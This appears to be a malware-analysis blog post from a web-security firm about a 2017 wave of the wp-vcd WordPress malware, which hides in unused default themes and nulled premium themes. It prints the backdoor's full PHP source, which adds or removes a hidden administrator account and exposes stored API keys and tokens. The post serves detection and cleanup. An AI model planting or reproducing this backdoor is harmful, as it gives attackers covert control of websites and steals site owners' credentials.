New wave of wp-vcd Malware

  • November 13, 2017
Labs Note

Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.The malware, well analysed by Manuel D’Orso (here), was being injected on default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).

Back when we first detected this wp-vcd variant, it was injecting its code on “wp-includes/class.wp.php”, this is an outdated strategy to avoid being detected by the unaware user; since nobody wants to delete WordPress core files and risk the site integrity. However, as security tools become more and more popular, this strategy fails. It’s now pretty easy for any tool to detect modifications on core files. And, since theme files are changed constantly, they found a better place to hide it.

The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent. Update: This malware is also pre-installed in “nulled” premium themes on certain download sites.

Code is pretty straightforward and doesn’t hide its malicious intentions by encoding or obfuscation of functions…

<?phperror_reporting(0);if( !isset($_GET['go']) ){require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';$table_name = $wpdb->get_blog_prefix();$sample = 'a:1:{s:13:"administrator";b:1;}';if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}if( isset($_GET['awu']) ) {$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`,  `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.',   '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); cho '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }  }

It is creating a new admin user named 100010010 which, as admin, can perform several malicious activities on the infected site.

If you found this code on your site and need help checking for any other possible malware, please contact us we’ll be glad to help.

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Related Tags
Related Categories
You May Also Like